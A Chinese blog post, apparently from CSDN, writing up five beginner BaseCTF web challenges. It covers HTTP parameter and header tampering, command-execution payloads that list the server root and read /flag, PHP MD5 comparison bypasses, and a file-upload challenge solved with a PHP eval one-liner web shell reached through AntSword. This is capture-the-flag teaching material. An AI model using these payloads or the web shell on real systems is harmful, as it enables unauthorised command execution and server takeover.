BaseCTF-Web-week1

于 2024-08-22 10:50:42 发布
阅读量394 收藏 4
点赞数 17
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71913298/article/details/141265327
版权

BaseCTF-Web-week1—清风

最近正在举行BaseCTF作为新手的我刚好去参加,发现自己太多漏洞,知识点掌握不牢,现在写web-week1的五个题目WP。

[Week1] HTTP 是什么呀

进入靶场,内容其实很简单,都是最简单的参数传递,还没有进行各种绕过

在这里插入图片描述

1-这里解题可以使用burpSuite抓包进行参数的传递。
2-这里也可以使用浏览器的插件(hackbar)进行参数的传递。
①使用burpSuite解此题
题目咱可以不会写,但是我们的思路一定不能有问题,了解此题的一个大体框架。你说呢?当然我确实是有点小菜,仅个人人观点。

此题目是完成参数的传递即可获得flag,此题目有六个参数,这里有GET参数、POST参数、Cookie参数、User-Agent参数、Referer、本地IP,一共六个参数。

这里需要注意:
GET参数传参数前面需要一个问号(?),GET传参时会进行url解码一次,所以需要对%00进行url编码一次为%2500,这样保证url解码为后为%00,url编码是指%后加ASCII码数值。
POST参数传递就正常写最后就行,
Cookie传参前面需要自己加上Cookie:响应头,
User-Agent传参需要删除原有的参数,
Referer传参数前面需要自己加上Referer:响应头,
本地IP需要自己加上Client-Ip:响应头

抓包原本响应头

在这里插入图片描述

参数传递后的响应头(这里特意用红色方框圈出来)

在这里插入图片描述

然后放包,在返回包中查看flag
在这里插入图片描述

看见flag被Base64加密,使用软件Base64解码取得flag,成功拿下flag

在这里插入图片描述

②使用HackBar插件解题(这里我使用火狐浏览器)

此题目是完成参数的传递即可获得flag,此题目有六个参数,这里有GET参数、POST参数、Cookie参数、User-Agent参数、Referer、本地IP,一共六个参数。

这里需要注意:
GET参数传参数前面需要一个问号(?),GET传参时会进行url解码一次,所以需要对%00进行url编码一次为%2500,这样保证url解码为后为%00,url编码是指%后加ASCII码数值。
POST参数传递就正常写最后就行,
Cookie传参前面需要自己加上Cookie:响应头,
User-Agent传参需要删除原有的参数,
Referer传参数前面需要自己加上Referer:响应头,
本地IP需要自己加上Client-Ip:响应头

这里我写主要传参过程,F12打开插件进行参数填写

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

这里就取得flag了,第一题结束

[Week1] 喵喵喵´•ﻌ•`

此题相对第一题简单许多,基本的GET传参数和命令执行,进入靶场

在这里插入图片描述

这里使用命令执行,读取根目录文件,请注意是根目录(ls /)这样是读取根目录

payload:?DT=system('ls /');

在这里插入图片描述

发现flag文件,进行文件读取取得flag

payload:?DT=system('cat /flag');

在这里插入图片描述

[Week1] md5绕过欸

此题目是GET传参和POST传参,md5弱类型绕过和强类型绕过(md5绕过在我前面的文章中有详细说明)MD5绕过文章

进入靶场,看源码

 <?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';

if (isset($_GET['name']) && isset($_POST['password']) && isset($_GET['name2']) && isset($_POST['password2']) ){
    $name = $_GET['name'];
    $name2 = $_GET['name2'];
    $password = $_POST['password'];
    $password2 = $_POST['password2'];
    if ($name != $password && md5($name) == md5($password)){
        if ($name2 !== $password2 && md5($name2) === md5($password2)){
            echo $flag;
        }
        else{
            echo "再看看啊,马上绕过嘞!";
        }
    }
    else {
        echo "错啦错啦";
    }

}
else {
    echo '没看到参数呐';
}
?> 没看到参数呐

分析

这里的name和password不相等,但弱类型相等。name2和password2中!== 进行比较时,不仅比较值,还比较值的类型,然后需满足强类型相等,获取flag。

这里弱类型绕过我使用科学计数法绕过,强类型绕过我使用数组绕过。当然此题目还可以使用碰撞绕过,即MD5加密后数值相等,但是未MD5加密前不相等,这里我就不进行演示,如有问题请私信或评论联系

payload:?name=QNKCDZO&name2[]=a
payload:password=240610708&password2[]=b

在这里插入图片描述

成功取得flag

在这里插入图片描述

[Week1] A Dark Room

此题目就比较简单了,看见这种小游戏的题目直接ctrl+u查看源码,搜索flag即可.进入靶场,是什么小游戏。

在这里插入图片描述

直接查看源码和获取flag

在这里插入图片描述

[Week1] upload

这个题目是文件上传的题目,然后蚁剑连接

这里使用burpsuite需要抓包写一句话木马

在这里插入图片描述

一句话木马:
<?php
@eval($_POST["cmd"]);
?>

在这里插入图片描述

上传之后给了源代码,并说明上传成功,同时看见我们用蚁剑连接的地址

在这里插入图片描述

使用蚁剑连接获取flag

在这里插入图片描述

BaseCTF-web-week1前五个题目结束了。

我清风 与诸君共勉,共创辉煌篇章。

后给了源代码,并说明上传成功,同时看见我们用蚁剑连接的地址

[外链图片转存中…(img-LtKhdbEn-1723800225807)]

使用蚁剑连接获取flag

[外链图片转存中…(img-uiH8PBXq-1723800225807)]

BaseCTF-web-week1前五个题目结束了。

我清风 与诸君共勉,共创辉煌篇章。

清风.春不晚
关注
  • 17
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
open-edu-web-server-week1
03-06
【标题】"open-edu-web-server-week1" 涉及的是一个关于Web服务器学习的课程,很可能是某个在线教育平台第一周的教学内容。在这个主题下,我们将深入探讨Web服务器的基础知识,特别是与HTML相关的部分。 【描述】...
unit-1-hw-week-1
05-05
需要把他们全都抓到 目标是构建您自己的pokedex。 要求 能够按类型或字母过滤(UI分段控件) 每个单元格应具有对应的图像 每个单元格都应有一个详细指示器(右侧箭头) 轻按后,该应用程序应将用户带到包含有关...
Week7-Web
03-11
第七周 该项目是使用版本11.1.1生成的。 开发服务器 为开发服务器运行ng serve 。... 如果您更改任何源文件,该应用程序将自动重新加载。 代码脚手架 运行ng generate component component-name生成一个新的组件。...
xdoj-week1-题解
05-12
【XDOJ-week1-题解】是针对2018年XDOJ(西安电子科技大学在线评测系统)第一周训练赛的题目解答集。这个压缩包文件包含了参赛者或教练对这一周比赛中的编程题目的详细解析,旨在帮助学习者理解和解决竞赛中的算法...
API-task-week1
03-25
在这个名为"API-task-week1"的学习任务中,我们很可能正在探讨如何使用API,特别是与HTML相关的API,来构建或增强Web应用的功能。 HTML(HyperText Markup Language)是网页内容的结构标准,而API则提供了在网页上...
C++ TinyWebServer项目总结(5. Linux网络编程基础API)
Teriri_的博客
08-16 935
还是给我的语雀文档打个广告:我的文章都是先在语雀里记录的,然后再同步发送到CSDN上,有些格式问题实在是懒得改了,可能会导致大家看的不舒服,建议有需要的大家可以看看我的原文:语雀。
wordpress网站“ERR_CONNECTION_REFUSED”错误
xiaoyuya
08-17 363
wordpress网站“ERR_CONNECTION_REFUSED”错误,是一个常见的wordpress错误。通过以上步骤,你应该能够诊断并解决WordPress中的“ERR_CONNECTION_REFUSED”错误。例如,最新的WordPress可能不支持PHP5.2,必须升级到PHP5.5或更高版本。如果WordPress无法连接到数据库,也会导致类似的错误。如果你使用的是云服务器,可以尝试重启服务器来解决问题。如果连接没有问题,尝试重新启动路由器或重新连接网络。有时浏览器缓存可能导致连接问题。
day32(8/20)——playbook剧本安装nginx、roles
wh992610的博客
08-21 487
roles(⻆⾊): 就是通过分别将variables, tasks及handlers等放置于单独的⽬录中,并可以便捷地调⽤它们的⼀种机制。假设我们要写⼀个playbook来安装管理lamp环境,那么这个playbook就会写很⻓。所以我们希望把这个很⼤的⽂件分成多个功能拆分, 分成apache管理,php管理,mysql管理,然后在需要使⽤的时候直接调⽤就可以了,以免重复写。就类似编程⾥的模块化的概念,以达到代码复⽤的效果。
thinkphp5漏洞分析之文件包含
m0_68976043的博客
08-20 539
最后,再通过一张攻击流程图来回顾整个攻击过程。
[Zer0pts2020]Can you guess it?1
kw741951的博客
08-17 435
打开题目看到信息随便输入一个数,显示错误查看源代码看到php代码,代码审计phpexit();} else {?= $message?>php }?
linux 网卡配置
轻口味的专栏
08-21 433
linux网卡可以通过命令和配置文件配置,如果是桌面环境还可以通过图形化界面配置.
62 网络设备的暗藏的操控者SNMP
qq_56248592的博客
08-19 102
一 SNMP 简介一 SNMP 简介SNMP(Simple Network Management Protocol,简单网络管理协议)广泛用于网络设备的。SNMP允许管理员通过NMS对网络上不同厂商、不同物理特性、采用不同互联技术的设备进行管理,包括状态监控、数据采集和故障处理。
nginx常用配置详解
简单,坚持
08-17 850
本文先按结构介绍nginx的配置,然后按需要实现的功能来介绍相应的配置方法。
理解安全组与防火墙的关系:云安全的双重保障
weixin_54574094的博客
08-18 656
通过理解它们的关系,并结合使用,您可以构建一个多层次的安全体系,确保您的系统和数据在面对日益复杂的网络威胁时仍然保持安全。您可以创建一个安全组,添加允许80(HTTP)和443(HTTPS)端口的入站规则,并将此安全组关联到您的Web服务器实例。例如,在一个企业的混合云环境中,您可以通过防火墙来保护本地数据中心的安全,同时通过安全组来管理云上实例的访问权限。安全组可以提供灵活、快速的实例级别的安全管理,而防火墙则负责更广泛的网络安全。安全组是云计算环境中使用的虚拟防火墙,用于控制实例的入站和出站流量。
WordPress禁止后台自定义功能
xiaoyuya
08-20 164
wordpress后台可以彻底禁止主题的自定义菜单功能,下面这段代码添加到functions.php文件中,后台外观菜单中的”自定义”就会消失不见了。小代码解决大问题,你学废了嘛。
wordpress修改域名方法及验证登录方法
tiging的博客
08-19 178
最后使用新域名访问就可以了。
PhpStorm环境配置与应用
2401_83447580的博客
08-21 613
通过修改phpstorm.vmoptions文件调整PhpStorm的内存分配以提高性能。设置排除不需要索引的目录以减少项目的索引时间。禁用不常用的插件以减少启动时间和内存占用。自定义快捷键以提高工作效率。通过以上配置和应用,PhpStorm能够极大地提高PHP开发者的开发效率和工作质量。
dompdf导出pdf中文乱码显示问号?、换行问题、设置图片大小
最新发布
Champagne_7的博客
08-21 383
环境:PHP 8.0 框架:ThinkPHP 8 软件包:phpoffice/phpword 、dompdf/dompdf。dompdf导出pdf中文乱码显示问号? 、换行问题、设置图片大小。看了很多教程(包括GitHub的issue、stackoverflow)都没有解决、最终找到解决问题的根本!
Catf1ag CTF Web(一)
Flag少侠的博客
08-17 3746
Catf1agCTF 是一个面向所有CTF(Capture The Flag)爱好者的综合训练平台,尤其适合新手学习和提升技能。该平台由catf1ag团队打造,拥有超过200个原创题目,题目设计注重知识点的掌握,旨在帮助新手掌握CTF相关的各种技能。除了新手题目,平台也包含难度不一的题目,适合不同水平的CTF参与者。平台上的题目类型多样,包括WEB、MISC、CRYPTO、LINUX、PWN/ATTACK、REVERSE等,题目分数制度从60分到100分不等,难度从1星到5星。
优化下列代码 <div class="homeTitleTop" v-if="week==1">周一值班人员</div> <div class="homeTitleTop" v-if="week==2">周二值班人员</div> <div class="homeTitleTop" v-if="week==3">周三值班人员</div> <div class="homeTitleTop" v-if="week==4">周四值班人员</div> <div class="homeTitleTop" v-if="week==5">周五值班人员</div> <div class="homeTitleTop" v-if="week==6">周六值班人员</div> <div class="homeTitleTop" v-if="week==7">周日值班人员</div>
06-01
可以将代码优化为使用数组和计算属性的方式,如下所示: ``` <template> <div class="homeTitleTop">{{ weekTitle }}</div> </template> <script> export default { data() { return { week: new Date().getDay(), weekTitles: [ '周日值班人员', '周一值班人员', '周二值班人员', '周三值班人员', '周四值班人员', '周五值班人员', '周六值班人员', ], }; }, computed: { weekTitle() { return this.weekTitles[this.week]; }, }, }; </script> ``` 这样可以通过计算属性 `weekTitle` 根据当前星期数 `week` 动态显示对应的标题,避免了在模板中使用多个 `v-if` 的情况,也使得代码更加简洁易懂。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值